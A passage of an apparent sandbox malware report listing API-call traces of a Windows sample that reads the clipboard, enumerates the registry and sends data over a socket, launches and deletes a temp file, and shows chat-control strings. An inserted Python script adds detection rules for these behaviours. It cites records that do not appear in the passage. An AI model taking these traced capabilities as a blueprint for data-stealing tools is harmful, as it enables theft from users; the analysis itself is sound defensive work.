                                              • Opcode ID: ef3a2b2680ef5ec4cf1756d8d4e3928048fec3981f722f661be4b2a60a96407b
                                              • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                              • Opcode Fuzzy Hash: ef3a2b2680ef5ec4cf1756d8d4e3928048fec3981f722f661be4b2a60a96407b
                                              • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                              • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                              • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                              • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                              • closesocket.WS2_32(000000FF), ref: 00404E5A
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                              • String ID:
                                              • API String ID: 3658366068-0
                                              • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                              • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                              • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                              • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                              APIs
                                                • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                              • GetLastError.KERNEL32 ref: 00455D6F
                                              • __dosmaperr.LIBCMT ref: 00455D76
                                              • GetFileType.KERNEL32(00000000), ref: 00455D82
                                              • GetLastError.KERNEL32 ref: 00455D8C
                                              • __dosmaperr.LIBCMT ref: 00455D95
                                              • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                              • CloseHandle.KERNEL32(?), ref: 00455EFF
                                              • GetLastError.KERNEL32 ref: 00455F31
                                              • __dosmaperr.LIBCMT ref: 00455F38
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                              • String ID: H
                                              • API String ID: 4237864984-2852464175
                                              • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                              • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                              • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                              • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                              APIs
                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                              • __alloca_probe_16.LIBCMT ref: 00453F6A
                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                              • __alloca_probe_16.LIBCMT ref: 00454014
                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                              • __freea.LIBCMT ref: 00454083
                                              • __freea.LIBCMT ref: 0045408F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                              • String ID: v%(/
                                              • API String ID: 201697637-2435473048
                                              • Opcode ID: aca7b2e34d6fca180bf378bc8fe33df5bb5a65d5f6b622e42f01d4b2dcd141bd
                                              • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                              • Opcode Fuzzy Hash: aca7b2e34d6fca180bf378bc8fe33df5bb5a65d5f6b622e42f01d4b2dcd141bd
                                              • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID: \&G$\&G$`&G
                                              • API String ID: 269201875-253610517
                                              • Opcode ID: d7fd4124445081cfc97c5454a1c142f1a87d4c625925bb8ca3a98cb7b9f8d762
                                              • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                              • Opcode Fuzzy Hash: d7fd4124445081cfc97c5454a1c142f1a87d4c625925bb8ca3a98cb7b9f8d762
                                              • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 65535$udp
                                              • API String ID: 0-1267037602
                                              • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                              • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                              • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                              • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
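Every record in this section lists its API calls in one fixed line shape (`• Name.MODULE(args), ref: addr`, with a `Part of subcall function XXXX:` prefix for calls made inside a callee). The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses that shape and flags behaviour clusters across the records above (the resolver that loads ws2_32/wship6 from the system directory and looks up getaddrinfo, the GDI+ routine that creates a directory and reads the local time for its time_/wnd_ names) and the clipboard reader in the record that follows (OpenClipboard, GetClipboardData(0xD), then send in a sub-function). The two embedded API blocks are copied from those records; the rule names and the API sets behind them are this example's own assumptions, and the clipboard-format table holds the standard Windows values (CF_TEXT = 1, CF_UNICODETEXT = 13).

```python
"""Parse Joe Sandbox per-function API listings and flag behaviour clusters.

Added example (not from the report or the sample). The line grammar is the
one visible in this page; the RULES table is this example's assumption.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# "• [Part of subcall function 0041288B: ]Api.MODULE[(a,b,c)], ref: 0041289B"
LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple[str, ...]
    ref: str
    callee: str | None  # address of the sub-function the call lives in, if any


def parse_api_block(text: str) -> list[ApiCall]:
    """Turn one record's API listing into ApiCall objects; other lines are skipped."""
    calls = []
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        args = tuple(a for a in (m["args"] or "").split(",") if a)
        calls.append(ApiCall(m["api"], m["module"], args, m["ref"], m["callee"]))
    return calls


# Assumed behaviour rules: every API in the set must occur in the same record.
RULES: dict[str, frozenset[str]] = {
    "dynamic API resolution": frozenset({"LoadLibraryA", "GetProcAddress"}),
    "clipboard read sent over socket": frozenset(
        {"OpenClipboard", "GetClipboardData", "send"}),
    "launches helper then exits": frozenset({"ShellExecuteW", "ExitProcess"}),
    "GDI+ output into timestamped directory": frozenset(
        {"GdiplusStartup", "CreateDirectoryW", "GetLocalTime"}),
}


def classify(calls: list[ApiCall]) -> list[str]:
    seen = {c.api for c in calls}
    return [name for name, needed in RULES.items() if needed <= seen]


def resolved_imports(calls: list[ApiCall]) -> list[str]:
    """Names passed to GetProcAddress (2nd arg), i.e. APIs resolved at runtime."""
    return [c.args[1] for c in calls
            if c.api == "GetProcAddress" and len(c.args) > 1 and c.args[1] != "?"]


CLIPBOARD_FORMATS = {1: "CF_TEXT", 13: "CF_UNICODETEXT"}  # standard Windows values


def clipboard_formats(calls: list[ApiCall]) -> list[str]:
    """Decode the format argument of each GetClipboardData call."""
    return [CLIPBOARD_FORMATS.get(int(c.args[0], 16), c.args[0])
            for c in calls if c.api == "GetClipboardData" and c.args]


# Sample input copied from two records on this page.
GETADDRINFO_BLOCK = """
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
• LoadLibraryA.KERNEL32(?), ref: 00414E52
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
• FreeLibrary.KERNEL32(00000000), ref: 00414E79
• LoadLibraryA.KERNEL32(?), ref: 00414EB1
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
• FreeLibrary.KERNEL32(00000000), ref: 00414ECA
• GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
• FreeLibrary.KERNEL32(00000000), ref: 00414EF0
"""

CLIPBOARD_BLOCK = """
• OpenClipboard.USER32 ref: 0041697C
• EmptyClipboard.USER32 ref: 0041698A
• CloseClipboard.USER32 ref: 00416990
• OpenClipboard.USER32 ref: 00416997
• GetClipboardData.USER32(0000000D), ref: 004169A7
• GlobalLock.KERNEL32(00000000), ref: 004169B0
• GlobalUnlock.KERNEL32(00000000), ref: 004169B9
• CloseClipboard.USER32 ref: 004169BF
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
"""

if __name__ == "__main__":
    for name, block in (("getaddrinfo", GETADDRINFO_BLOCK), ("clipboard", CLIPBOARD_BLOCK)):
        calls = parse_api_block(block)
        print(name, classify(calls), resolved_imports(calls), clipboard_formats(calls))
```

The callee field matters for the clipboard record: the send lives in sub-function 00404AA1, so a rule that only looked at direct calls would miss the exfiltration half and see nothing more than a clipboard read.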
                                              APIs
                                              • OpenClipboard.USER32 ref: 0041697C
                                              • EmptyClipboard.USER32 ref: 0041698A
                                              • CloseClipboard.USER32 ref: 00416990
                                              • OpenClipboard.USER32 ref: 00416997
                                              • GetClipboardData.USER32(0000000D), ref: 004169A7
                                              • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                              • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                              • CloseClipboard.USER32 ref: 004169BF
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Similarity
                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                              • String ID: !D@$xdF
                                              • API String ID: 2172192267-3540039394
                                              • Opcode ID: f8122d187f84bcc61e207b62fa39c018abbf95af5271be06fc2a6e9b15f4b477
                                              • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                              • Opcode Fuzzy Hash: f8122d187f84bcc61e207b62fa39c018abbf95af5271be06fc2a6e9b15f4b477
                                              • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                              • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                              • __dosmaperr.LIBCMT ref: 0043A926
                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                              • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                              • __dosmaperr.LIBCMT ref: 0043A963
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                              • __dosmaperr.LIBCMT ref: 0043A9B7
                                              • _free.LIBCMT ref: 0043A9C3
                                              • _free.LIBCMT ref: 0043A9CA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Similarity
                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                              • String ID:
                                              • API String ID: 2441525078-0
                                              • Opcode ID: 9262cdba7b4adcfb063e64ce379082e8e02018adb4241b1373288f504c0df5cf
                                              • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                              • Opcode Fuzzy Hash: 9262cdba7b4adcfb063e64ce379082e8e02018adb4241b1373288f504c0df5cf
                                              • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                              • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                              • __alloca_probe_16.LIBCMT ref: 0044AE40
                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                              • __freea.LIBCMT ref: 0044AEB0
                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                              • __freea.LIBCMT ref: 0044AEB9
                                              • __freea.LIBCMT ref: 0044AEDE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                              • String ID: v%(/
                                              • API String ID: 3864826663-2435473048
                                              • Opcode ID: fdde0a3fba0e2e79fb92f6962f835a9100c7e8c667bc286140aaf21858552f70
                                              • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                              • Opcode Fuzzy Hash: fdde0a3fba0e2e79fb92f6962f835a9100c7e8c667bc286140aaf21858552f70
                                              • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                              APIs
                                              • SetEvent.KERNEL32(?,?), ref: 004054BF
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                              • TranslateMessage.USER32(?), ref: 0040557E
                                              • DispatchMessageA.USER32(?), ref: 00405589
                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Similarity
                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                              • API String ID: 2956720200-749203953
                                              • Opcode ID: 52e40677220340df766a1066c6eba0187cdd1e922d62033c57619962968f1fb1
                                              • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                              • Opcode Fuzzy Hash: 52e40677220340df766a1066c6eba0187cdd1e922d62033c57619962968f1fb1
                                              • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                              APIs
                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Similarity
                                              • API ID: CloseEnumInfoOpenQuerysend
                                              • String ID: (aF$,aF$xUG$xdF$NG$NG$TG
                                              • API String ID: 3114080316-4028018678
                                              • Opcode ID: 882ff7e01c3d08ca6fdfa6cac83639225ac0c66ad9ccab99784801e0feb7fca5
                                              • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                              • Opcode Fuzzy Hash: 882ff7e01c3d08ca6fdfa6cac83639225ac0c66ad9ccab99784801e0feb7fca5
                                              • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                              APIs
                                                • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                              • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                              • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Similarity
                                              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                              • String ID: 0VG$0VG$<$@$Temp
                                              • API String ID: 1704390241-2575729100
